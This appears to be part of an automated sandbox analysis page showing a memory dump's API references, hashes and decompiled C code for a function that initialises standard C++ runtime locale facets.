0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989
0x6e1cf8fc
0x6e1cf8fc
0x6e1cf8ff
0x6e1cf903
0x6e1cf907
0x6e1cf914
0x6e1cf91c
0x6e1cf91e
0x00000000
0x6e1cf91e
0x6e1cf8e5
0x6e1cf8e5
0x00000000
0x6e1cf8e5
0x6e1cf8e3
0x6e1cf856
0x6e1cf856
0x6e1cf859
0x6e1cf85d
0x6e1cf861
0x6e1cf86e
0x6e1cf876
0x6e1cf878
0x00000000
0x6e1cf878
0x6e1cf83f
0x6e1cf83f
0x00000000
0x6e1cf83f
0x6e1cf83d

APIs

__EH_prolog3.LIBCMT ref: 6E1CF806
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF810
int.LIBCPMT ref: 6E1CF827

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF89F

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b21e8cbcbc28e225b7c82c9953daa4e3c39eec8def2fbb1f07a6ee485bd07a4a
Instruction ID: 9d1e5caef6308bc1c09561e3f8c731b572e26b420acda9250dbae664451146fc
Opcode Fuzzy Hash: b21e8cbcbc28e225b7c82c9953daa4e3c39eec8def2fbb1f07a6ee485bd07a4a
Instruction Fuzzy Hash: DE110A759105298BCF01EBE4C854AFDB77AAF65B14F240809E520EB290DF7899C4E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF41B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CF41B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t209;
				signed int _t210;
				void* _t222;
				void* _t235;
				void* _t248;
				void* _t261;
				void* _t274;
				void* _t287;
				void* _t300;
				void* _t313;
				void* _t326;
				void* _t339;
				void* _t352;
				void* _t365;
				void* _t378;
				signed int _t549;
				signed int _t595;
				signed int _t596;
				signed int _t597;
				signed int _t598;
				signed int _t599;
				signed int _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t604;
				signed int _t605;
				signed int _t606;
				signed int _t607;
				signed int _t609;
				signed int _t610;
				signed int _t611;
				signed int _t612;
				signed int _t613;
				signed int _t614;
				signed int _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t619;
				signed int _t620;
				signed int _t621;
				signed int _t622;
				signed int _t623;
				void* _t638;

				_t592 = __edx;
				_t451 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t638 - 0x14, 0);
				_t609 =  *0x6e286df0; // 0x0
				 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
				 *(_t638 - 0x10) = _t609;
				_t209 = E6E1A161C(0x6e286d9c);
				_t454 =  *((intOrPtr*)(_t638 + 8));
				_t210 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t209);
				_t594 = _t210;
				if(_t210 != 0) {
					L5:
					E6E1C66BA(_t638 - 0x14);
					return E6E1E0075(_t594);
				} else {
					if(_t609 == 0) {
						_push( *((intOrPtr*)(_t638 + 8)));
						_push(_t638 - 0x10);
						__eflags = E6E1D1057(__ebx, _t454, __edx, _t594, _t609) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t638 - 0x20);
							E6E1E3D74(_t638 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t594, _t609, 0x14);
							E6E1C6653(_t638 - 0x14, 0);
							_t610 =  *0x6e286dc0; // 0x0
							 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
							 *(_t638 - 0x10) = _t610;
							_t222 = E6E1A161C(0x6e286d74);
							_t461 =  *((intOrPtr*)(_t638 + 8));
							_t595 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t222);
							__eflags = _t595;
							if(_t595 != 0) {
								L12:
								E6E1C66BA(_t638 - 0x14);
								return E6E1E0075(_t595);
							} else {
								__eflags = _t610;
								if(_t610 == 0) {
									_push( *((intOrPtr*)(_t638 + 8)));
									_push(_t638 - 0x10);
									__eflags = E6E1D10BF(_t451, _t461, __edx, _t595, _t610) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t638 - 0x20);
										E6E1E3D74(_t638 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t451, _t595, _t610, 0x14);
										E6E1C6653(_t638 - 0x14, 0);
										_t611 =  *0x6e286df8; // 0x0
										 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
										 *(_t638 - 0x10) = _t611;
										_t235 = E6E1A161C(0x6e286da4);
										_t468 =  *((intOrPtr*)(_t638 + 8));
										_t596 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t235);
										__eflags = _t596;
										if(_t596 != 0) {
											L19:
											E6E1C66BA(_t638 - 0x14);
											return E6E1E0075(_t596);
										} else {
											__eflags = _t611;
											if(_t611 == 0) {
												_push( *((intOrPtr*)(_t638 + 8)));
												_push(_t638 - 0x10);
												__eflags = E6E1D1127(_t451, _t468, __edx, _t596, _t611) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t638 - 0x20);
													E6E1E3D74(_t638 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t451, _t596, _t611, 0x14);
													E6E1C6653(_t638 - 0x14, 0);
													_t612 =  *0x6e286df4; // 0x0
													 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
													 *(_t638 - 0x10) = _t612;
													_t248 = E6E1A161C(0x6e286da0);
													_t475 =  *((intOrPtr*)(_t638 + 8));
													_t597 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t248);
													__eflags = _t597;
													if(_t597 != 0) {
														L26:
														E6E1C66BA(_t638 - 0x14);
														return E6E1E0075(_t597);
													} else {
														__eflags = _t612;
														if(_t612 == 0) {
															_push( *((intOrPtr*)(_t638 + 8)));
															_push(_t638 - 0x10);
															__eflags = E6E1D11AB(_t451, _t475, _t592, _t597, _t612) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t638 - 0x20);
																E6E1E3D74(_t638 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t451, _t597, _t612, 0x14);
																E6E1C6653(_t638 - 0x14, 0);
																_t613 =  *0x6e286dc8; // 0x0
																 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																 *(_t638 - 0x10) = _t613;
																_t261 = E6E1A161C(0x6e286d7c);
																_t482 =  *((intOrPtr*)(_t638 + 8));
																_t598 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t261);
																__eflags = _t598;
																if(_t598 != 0) {
																	L33:
																	E6E1C66BA(_t638 - 0x14);
																	return E6E1E0075(_t598);
																} else {
																	__eflags = _t613;
																	if(_t613 == 0) {
																		_push( *((intOrPtr*)(_t638 + 8)));
																		_push(_t638 - 0x10);
																		__eflags = E6E1D1230(_t451, _t482, _t592, _t598, _t613) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t638 - 0x20);
																			E6E1E3D74(_t638 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t451, _t598, _t613, 0x14);
																			E6E1C6653(_t638 - 0x14, 0);
																			_t614 =  *0x6e286dc4; // 0x0
																			 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																			 *(_t638 - 0x10) = _t614;
																			_t274 = E6E1A161C(0x6e286d78);
																			_t489 =  *((intOrPtr*)(_t638 + 8));
																			_t599 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t274);
																			__eflags = _t599;
																			if(_t599 != 0) {
																				L40:
																				E6E1C66BA(_t638 - 0x14);
																				return E6E1E0075(_t599);
																			} else {
																				__eflags = _t614;
																				if(_t614 == 0) {
																					_push( *((intOrPtr*)(_t638 + 8)));
																					_push(_t638 - 0x10);
																					__eflags = E6E1D12B4(_t451, _t489, _t592, _t599, _t614) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t638 - 0x20);
																						E6E1E3D74(_t638 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t451, _t599, _t614, 0x14);
																						E6E1C6653(_t638 - 0x14, 0);
																						_t615 =  *0x6e286dd8; // 0x0
																						 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																						 *(_t638 - 0x10) = _t615;
																						_t287 = E6E1A161C(0x6e286d84);
																						_t496 =  *((intOrPtr*)(_t638 + 8));
																						_t600 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t287);
																						__eflags = _t600;
																						if(_t600 != 0) {
																							L47:
																							E6E1C66BA(_t638 - 0x14);
																							return E6E1E0075(_t600);
																						} else {
																							__eflags = _t615;
																							if(_t615 == 0) {
																								_push( *((intOrPtr*)(_t638 + 8)));
																								_push(_t638 - 0x10);
																								__eflags = E6E1D1339(_t451, _t496, _t592, _t600, _t615) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t638 - 0x20);
																									E6E1E3D74(_t638 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t451, _t600, _t615, 0x14);
																									E6E1C6653(_t638 - 0x14, 0);
																									_t616 =  *0x6e286db0; // 0x0
																									 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																									 *(_t638 - 0x10) = _t616;
																									_t300 = E6E1A161C(0x6e286d64);
																									_t503 =  *((intOrPtr*)(_t638 + 8));
																									_t601 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t300);
																									__eflags = _t601;
																									if(_t601 != 0) {
																										L54:
																										E6E1C66BA(_t638 - 0x14);
																										return E6E1E0075(_t601);
																									} else {
																										__eflags = _t616;
																										if(_t616 == 0) {
																											_push( *((intOrPtr*)(_t638 + 8)));
																											_push(_t638 - 0x10);
																											__eflags = E6E1D13A1(_t451, _t503, _t592, _t601, _t616) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1A1438(_t638 - 0x20);
																												E6E1E3D74(_t638 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e2283cf, _t451, _t601, _t616, 0x14);
																												E6E1C6653(_t638 - 0x14, 0);
																												_t617 =  *0x6e286ddc; // 0x0
																												 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																												 *(_t638 - 0x10) = _t617;
																												_t313 = E6E1A161C(0x6e286d88);
																												_t510 =  *((intOrPtr*)(_t638 + 8));
																												_t602 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t313);
																												__eflags = _t602;
																												if(_t602 != 0) {
																													L61:
																													E6E1C66BA(_t638 - 0x14);
																													return E6E1E0075(_t602);
																												} else {
																													__eflags = _t617;
																													if(_t617 == 0) {
																														_push( *((intOrPtr*)(_t638 + 8)));
																														_push(_t638 - 0x10);
																														__eflags = E6E1D1409(_t451, _t510, _t592, _t602, _t617) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1A1438(_t638 - 0x20);
																															E6E1E3D74(_t638 - 0x20, 0x6e283504);
																															asm("int3");
																															E6E1E00AC(0x6e2283cf, _t451, _t602, _t617, 0x14);
																															E6E1C6653(_t638 - 0x14, 0);
																															_t618 =  *0x6e286de0; // 0x0
																															 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																															 *(_t638 - 0x10) = _t618;
																															_t326 = E6E1A161C(0x6e286d8c);
																															_t517 =  *((intOrPtr*)(_t638 + 8));
																															_t603 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t326);
																															__eflags = _t603;
																															if(_t603 != 0) {
																																L68:
																																E6E1C66BA(_t638 - 0x14);
																																return E6E1E0075(_t603);
																															} else {
																																__eflags = _t618;
																																if(_t618 == 0) {
																																	_push( *((intOrPtr*)(_t638 + 8)));
																																	_push(_t638 - 0x10);
																																	__eflags = E6E1D1471(_t451, _t517, _t592, _t603, _t618) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1A1438(_t638 - 0x20);
																																		E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																		asm("int3");
																																		E6E1E00AC(0x6e2283cf, _t451, _t603, _t618, 0x14);
																																		E6E1C6653(_t638 - 0x14, 0);
																																		_t619 =  *0x6e286dfc; // 0x0
																																		 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																		 *(_t638 - 0x10) = _t619;
																																		_t339 = E6E1A161C(0x6e286da8);
																																		_t524 =  *((intOrPtr*)(_t638 + 8));
																																		_t604 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t339);
																																		__eflags = _t604;
																																		if(_t604 != 0) {
																																			L75:
																																			E6E1C66BA(_t638 - 0x14);
																																			return E6E1E0075(_t604);
																																		} else {
																																			__eflags = _t619;
																																			if(_t619 == 0) {
																																				_push( *((intOrPtr*)(_t638 + 8)));
																																				_push(_t638 - 0x10);
																																				__eflags = E6E1D14EC(_t451, _t524, _t592, _t604, _t619) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1A1438(_t638 - 0x20);
																																					E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																					asm("int3");
																																					E6E1E00AC(0x6e2283cf, _t451, _t604, _t619, 0x14);
																																					E6E1C6653(_t638 - 0x14, 0);
																																					_t620 =  *0x6e286dcc; // 0x0
																																					 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																					 *(_t638 - 0x10) = _t620;
																																					_t352 = E6E1A161C(0x6e286d80);
																																					_t531 =  *((intOrPtr*)(_t638 + 8));
																																					_t605 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t352);
																																					__eflags = _t605;
																																					if(_t605 != 0) {
																																						L82:
																																						E6E1C66BA(_t638 - 0x14);
																																						return E6E1E0075(_t605);
																																					} else {
																																						__eflags = _t620;
																																						if(_t620 == 0) {
																																							_push( *((intOrPtr*)(_t638 + 8)));
																																							_push(_t638 - 0x10);
																																							__eflags = E6E1D1558(_t451, _t531, _t592, _t605, _t620) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1A1438(_t638 - 0x20);
																																								E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																								asm("int3");
																																								E6E1E00AC(0x6e2283cf, _t451, _t605, _t620, 0x14);
																																								E6E1C6653(_t638 - 0x14, 0);
																																								_t621 =  *0x6e286e00; // 0x0
																																								 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																								 *(_t638 - 0x10) = _t621;
																																								_t365 = E6E1A161C(0x6e286dac);
																																								_t538 =  *((intOrPtr*)(_t638 + 8));
																																								_t606 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t365);
																																								__eflags = _t606;
																																								if(_t606 != 0) {
																																									L89:
																																									E6E1C66BA(_t638 - 0x14);
																																									return E6E1E0075(_t606);
																																								} else {
																																									__eflags = _t621;
																																									if(_t621 == 0) {
																																										_push( *((intOrPtr*)(_t638 + 8)));
																																										_push(_t638 - 0x10);
																																										__eflags = E6E1D15C4(_t451, _t538, _t592, _t606, _t621) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1A1438(_t638 - 0x20);
																																											E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																											asm("int3");
																																											E6E1E00AC(0x6e2283cf, _t451, _t606, _t621, 0x14);
																																											E6E1C6653(_t638 - 0x14, 0);
																																											_t622 =  *0x6e286dd0; // 0x0
																																											 *(_t638 - 4) =  *(_t638 - 4) & 0x00000000;
																																											 *(_t638 - 0x10) = _t622;
																																											_t378 = E6E1A161C(0x6e286d60);
																																											_t545 =  *((intOrPtr*)(_t638 + 8));
																																											_t607 = E6E1A171B( *((intOrPtr*)(_t638 + 8)), _t378);
																																											__eflags = _t607;
																																											if(_t607 != 0) {
																																												L96:
																																												E6E1C66BA(_t638 - 0x14);
																																												return E6E1E0075(_t607);
																																											} else {
																																												__eflags = _t622;
																																												if(_t622 == 0) {
																																													_push( *((intOrPtr*)(_t638 + 8)));
																																													_push(_t638 - 0x10);
																																													__eflags = E6E1D162A(_t451, _t545, _t592, _t607, _t622) - 0xffffffff;
																																													if(__eflags == 0) {
																																														_t549 = _t638 - 0x20;
																																														E6E1A1438(_t549);
																																														E6E1E3D74(_t638 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e22851f, _t451, _t607, _t622, 4);
																																														_t623 = _t549;
																																														 *(_t638 - 0x10) = _t623;
																																														 *((intOrPtr*)(_t623 + 4)) =  *((intOrPtr*)(_t638 + 0xc));
																																														_push( *((intOrPtr*)(_t638 + 0x14)));
																																														_t203 = _t638 - 4;
																																														 *_t203 =  *(_t638 - 4) & 0x00000000;
																																														__eflags =  *_t203;
																																														 *_t623 = 0x6e22c0c4;
																																														 *((char*)(_t623 + 0x28)) =  *((intOrPtr*)(_t638 + 0x10));
																																														E6E1D542F(_t451, _t549, _t592, _t607, _t623,  *_t203);
																																														return E6E1E0075(_t623,  *((intOrPtr*)(_t638 + 8)));
																																													} else {
																																														_t607 =  *(_t638 - 0x10);
																																														 *(_t638 - 0x10) = _t607;
																																														 *(_t638 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t607);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t607 + 4))))();
																																														 *0x6e286dd0 = _t607;
																																														goto L96;
																																													}
																																												} else {
																																													_t607 = _t622;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t606 =  *(_t638 - 0x10);
																																											 *(_t638 - 0x10) = _t606;
																																											 *(_t638 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t606);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t606 + 4))))();
																																											 *0x6e286e00 = _t606;
																																											goto L89;
																																										}
																																									} else {
																																										_t606 = _t621;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t605 =  *(_t638 - 0x10);
																																								 *(_t638 - 0x10) = _t605;
																																								 *(_t638 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t605);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t605 + 4))))();
																																								 *0x6e286dcc = _t605;
																																								goto L82;
																																							}
																																						} else {
																																							_t605 = _t620;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t604 =  *(_t638 - 0x10);
																																					 *(_t638 - 0x10) = _t604;
																																					 *(_t638 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t604);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t604 + 4))))();
																																					 *0x6e286dfc = _t604;
																																					goto L75;
																																				}
																																			} else {
																																				_t604 = _t619;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t603 =  *(_t638 - 0x10);
																																		 *(_t638 - 0x10) = _t603;
																																		 *(_t638 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t603);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t603 + 4))))();
																																		 *0x6e286de0 = _t603;
																																		goto L68;
																																	}
																																} else {
																																	_t603 = _t618;
																																	goto L68;
																																}
																															}
																														} else {
																															_t602 =  *(_t638 - 0x10);
																															 *(_t638 - 0x10) = _t602;
																															 *(_t638 - 4) = 1;
																															E6E1C6FD3(__eflags, _t602);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t602 + 4))))();
																															 *0x6e286ddc = _t602;
																															goto L61;
																														}
																													} else {
																														_t602 = _t617;
																														goto L61;
																													}
																												}
																											} else {
																												_t601 =  *(_t638 - 0x10);
																												 *(_t638 - 0x10) = _t601;
																												 *(_t638 - 4) = 1;
																												E6E1C6FD3(__eflags, _t601);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t601 + 4))))();
																												 *0x6e286db0 = _t601;
																												goto L54;
																											}
																										} else {
																											_t601 = _t616;
																											goto L54;
																										}
																									}
																								} else {
																									_t600 =  *(_t638 - 0x10);
																									 *(_t638 - 0x10) = _t600;
																									 *(_t638 - 4) = 1;
																									E6E1C6FD3(__eflags, _t600);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t600 + 4))))();
																									 *0x6e286dd8 = _t600;
																									goto L47;
																								}
																							} else {
																								_t600 = _t615;
																								goto L47;
																							}
																						}
																					} else {
																						_t599 =  *(_t638 - 0x10);
																						 *(_t638 - 0x10) = _t599;
																						 *(_t638 - 4) = 1;
																						E6E1C6FD3(__eflags, _t599);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t599 + 4))))();
																						 *0x6e286dc4 = _t599;
																						goto L40;
																					}
																				} else {
																					_t599 = _t614;
																					goto L40;
																				}
																			}
																		} else {
																			_t598 =  *(_t638 - 0x10);
																			 *(_t638 - 0x10) = _t598;
																			 *(_t638 - 4) = 1;
																			E6E1C6FD3(__eflags, _t598);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t598 + 4))))();
																			 *0x6e286dc8 = _t598;
																			goto L33;
																		}
																	} else {
																		_t598 = _t613;
																		goto L33;
																	}
																}
															} else {
																_t597 =  *(_t638 - 0x10);
																 *(_t638 - 0x10) = _t597;
																 *(_t638 - 4) = 1;
																E6E1C6FD3(__eflags, _t597);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t597 + 4))))();
																 *0x6e286df4 = _t597;
																goto L26;
															}
														} else {
															_t597 = _t612;
															goto L26;
														}
													}
												} else {
													_t596 =  *(_t638 - 0x10);
													 *(_t638 - 0x10) = _t596;
													 *(_t638 - 4) = 1;
													E6E1C6FD3(__eflags, _t596);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t596 + 4))))();
													 *0x6e286df8 = _t596;
													goto L19;
												}
											} else {
												_t596 = _t611;
												goto L19;
											}
										}
									} else {
										_t595 =  *(_t638 - 0x10);
										 *(_t638 - 0x10) = _t595;
										 *(_t638 - 4) = 1;
										E6E1C6FD3(__eflags, _t595);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t595 + 4))))();
										 *0x6e286dc0 = _t595;
										goto L12;
									}
								} else {
									_t595 = _t610;
									goto L12;
								}
							}
						} else {
							_t594 =  *(_t638 - 0x10);
							 *(_t638 - 0x10) = _t594;
							 *(_t638 - 4) = 1;
							E6E1C6FD3(__eflags, _t594);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t594 + 4))))();
							 *0x6e286df0 = _t594;
							goto L5;
						}
					} else {
						_t594 = _t609;
						goto L5;
					}
				}
			}

0x6e1cf41b
0x6e1cf41b
0x6e1cf422
0x6e1cf42c
0x6e1cf431
0x6e1cf43c
0x6e1cf440
0x6e1cf443
0x6e1cf448
0x6e1cf44c
0x6e1cf451
0x6e1cf455
0x6e1cf49a
0x6e1cf49d
0x6e1cf4a9
0x6e1cf457
0x6e1cf459
0x6e1cf45f
0x6e1cf465
0x6e1cf46d
0x6e1cf470
0x6e1cf4ad
0x6e1cf4bb
0x6e1cf4c0
0x6e1cf4c8
0x6e1cf4d2
0x6e1cf4d7
0x6e1cf4e2
0x6e1cf4e6
0x6e1cf4e9
0x6e1cf4ee
0x6e1cf4f7
0x6e1cf4f9
0x6e1cf4fb
0x6e1cf540
0x6e1cf543
0x6e1cf54f
0x6e1cf4fd
0x6e1cf4fd
0x6e1cf4ff
0x6e1cf505
0x6e1cf50b
0x6e1cf513
0x6e1cf516
0x6e1cf553
0x6e1cf561
0x6e1cf566
0x6e1cf56e
0x6e1cf578
0x6e1cf57d
0x6e1cf588
0x6e1cf58c
0x6e1cf58f
0x6e1cf594
0x6e1cf59d
0x6e1cf59f
0x6e1cf5a1
0x6e1cf5e6
0x6e1cf5e9
0x6e1cf5f5
0x6e1cf5a3
0x6e1cf5a3
0x6e1cf5a5
0x6e1cf5ab
0x6e1cf5b1
0x6e1cf5b9
0x6e1cf5bc
0x6e1cf5f9
0x6e1cf607
0x6e1cf60c
0x6e1cf614
0x6e1cf61e
0x6e1cf623
0x6e1cf62e
0x6e1cf632
0x6e1cf635
0x6e1cf63a
0x6e1cf643
0x6e1cf645
0x6e1cf647
0x6e1cf68c
0x6e1cf68f
0x6e1cf69b
0x6e1cf649
0x6e1cf649
0x6e1cf64b
0x6e1cf651
0x6e1cf657
0x6e1cf65f
0x6e1cf662
0x6e1cf69f
0x6e1cf6ad
0x6e1cf6b2
0x6e1cf6ba
0x6e1cf6c4
0x6e1cf6c9
0x6e1cf6d4
0x6e1cf6d8
0x6e1cf6db
0x6e1cf6e0
0x6e1cf6e9
0x6e1cf6eb
0x6e1cf6ed
0x6e1cf732
0x6e1cf735
0x6e1cf741
0x6e1cf6ef
0x6e1cf6ef
0x6e1cf6f1
0x6e1cf6f7
0x6e1cf6fd
0x6e1cf705
0x6e1cf708
0x6e1cf745
0x6e1cf753
0x6e1cf758
0x6e1cf760
0x6e1cf76a
0x6e1cf76f
0x6e1cf77a
0x6e1cf77e
0x6e1cf781
0x6e1cf786
0x6e1cf78f
0x6e1cf791
0x6e1cf793
0x6e1cf7d8
0x6e1cf7db
0x6e1cf7e7
0x6e1cf795
0x6e1cf795
0x6e1cf797
0x6e1cf79d
0x6e1cf7a3
0x6e1cf7ab
0x6e1cf7ae
0x6e1cf7eb
0x6e1cf7f9
0x6e1cf7fe
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf835
0x6e1cf837
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
